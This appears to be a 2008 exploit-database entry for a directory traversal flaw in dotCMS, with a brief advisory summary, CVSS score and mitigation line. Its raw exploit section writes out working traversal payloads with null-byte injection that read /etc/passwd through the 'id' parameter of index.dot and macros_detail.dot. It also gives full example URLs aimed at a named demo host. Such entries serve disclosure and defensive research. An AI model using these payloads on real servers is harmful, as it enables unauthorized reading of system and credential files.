dotCMS Directory Traversal Vulnerability

vendor:

dotCMS

by:

milw0rm.com

7.5

CVSS

HIGH

Directory Traversal

CWE

Product Name: dotCMS

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

dotCMS Directory Traversal Vulnerability

A directory traversal vulnerability exists in dotCMS, which allows an attacker to read arbitrary files on the server. This is due to a lack of proper sanitization of user-supplied input to the 'id' parameter in the 'index.dot' and 'macros_detail.dot' scripts. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing directory traversal sequences (e.g. '../../../../../../../../etc/passwd%00.jpg') to the vulnerable server. Successful exploitation will allow an attacker to read arbitrary files on the server.

Mitigation:

Script should filter meta characters from user input.

Source

Exploit-DB raw data:

++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ script:dotCMS
+ home: http://www.dotcms.org
+ demo: http://www.dotcms.org/the_dotcms/demos/demo.dot
+ founder: Don of h4cky0u.org
+ Vulnerability: Directory traversal
++++++++++++++++++++++++++++++++++++++++++++++++++++++

exploit:
/index.dot?id=../../../../../../../../etc/passwd%00.jpg
/macros/macros_detail.dot?id=../../../../../../../../etc/passwd%00.html

example:
http://demo.dotcms.org/news/index.dot?id=../../../../../../../../etc/passwd%00.jpg
http://demo.dotcms.org/getting_started/macros/macros_detail.dot?id=../../../../../../../../etc/passwd%00.html

solution:
Script should filter meta characters from user input.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++

# milw0rm.com [2008-08-15]